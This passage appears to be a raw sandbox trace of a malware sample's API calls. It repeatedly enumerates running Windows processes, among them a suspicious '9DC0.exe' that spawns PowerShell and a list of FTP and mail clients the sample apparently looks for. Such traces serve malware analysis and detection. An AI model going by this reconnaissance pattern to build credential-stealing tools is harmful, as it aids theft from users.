dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0191.553] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.555] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.556] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0191.558] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0191.560] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0191.561] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0191.563] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0191.565] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.566] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0191.568] CloseHandle (hObject=0x17ec) returned 1 [0191.568] Sleep (dwMilliseconds=0x64) [0191.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0191.685] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.686] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.688] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.689] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.691] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.693] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.696] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.698] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.700] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.701] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.703] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.721] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.726] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.727] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.732] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.737] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.744] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.750] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.755] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.776] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.778] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.779] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.781] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.783] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.784] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.786] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.788] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0191.789] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0191.791] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0191.792] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.793] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.795] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.815] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.840] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.843] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.844] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0191.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0191.848] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0191.849] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0191.850] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0191.852] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0191.853] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0191.855] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0191.857] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0191.859] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0191.861] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0191.862] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0191.864] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0191.865] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0191.866] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0191.868] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0191.869] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0191.871] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0191.925] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0191.927] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0191.928] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0191.930] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0191.932] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0191.934] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0191.936] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0191.938] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0191.944] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0191.947] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0191.949] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0191.952] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0191.955] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0191.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0191.966] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0191.970] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0191.972] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0191.975] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0191.985] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 